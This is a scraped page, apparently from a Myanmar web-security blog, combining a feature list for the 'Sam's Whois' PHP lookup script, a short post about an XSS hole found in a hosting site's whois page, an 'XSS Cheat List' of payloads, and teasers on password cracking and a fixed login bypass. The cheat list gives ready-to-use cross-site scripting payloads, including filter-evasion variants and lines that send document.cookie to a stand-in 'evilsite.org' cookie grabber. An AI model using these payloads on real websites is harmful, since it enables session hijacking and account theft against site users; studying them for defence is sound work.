Sam’s Whois is a free php class with supporting scripts which make adding a domain name whois lookup to your website incredibly simple.

Main Features

* All major tlds supported (including com, net, org, info, biz, us, co.uk, org.uk, etc).
* Optionally automatically redirect a query to the authoritative whois server for a tld     where appropriate (.com and .net).
* CSS-based design for easy integration with your existing website design.
* Free to use (see the licence page for full details)
* Can cache whois lookup results for a specified amount of time, reducing bandwidth and system usage.
* Optionally require users to enter a randomly generated code, displayed as an image, for each lookup to stop people using scripts to abuse the system.
* Comes with a detailed and heavily commented example script fully illustrating usage.
* Easy installation – Basic version requires only 1 line of code. View the quickstart guide here.
* Optionally clean whois data of extraneous text (for some tlds).
* Easily limit which tlds are supported with one line of code.
* Optionally hilight main fields in the whois data for extra clarity.

Software

Today infofreakzzz informed a XSS @ WorldWideMyanmar… http://webhost.worldwidemyanmar.com/domain-name/ Oh It’s mine :D…. using it since long long ago 🙂 then i checked n found it.

Explore More

XSS Cheat List

<script>alert(1);</script> <script>alert('XSS');</script> <script src="http://www.evilsite.org/cookiegrabber.php"></script> <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script> <scr<script>ipt>alert('XSS');</scr</script>ipt> <script>alert(String.fromCharCode(88,83,83))</script> <img src=foo.png onerror=alert(/xssed/) /> <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> <marquee><script>alert('XSS')</script></marquee> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> "><script>alert(0)</script> <script src=http://yoursite.com/your_files.js></script> </title><script>alert(/xss/)</script> </textarea><script>alert(/xss/)</script>

Read More

Common Scams

* Password Cracking Password cracking is a common way to retrieve a password by repeatedly trying to guess for the password. The most common method of password cracking is guessing

Read More

Login Bypass vulnerability of Myanmar Sites (Fixed)

Last week PlanetCreator informed Security Weakness of Myanmar Uready http://www.myanmaruready.com/ and Su Aung Phyo Co., Ltd. http://www.suaungphyo.com to their webmaster and fixed as long as we reported. SQL injection is

Read More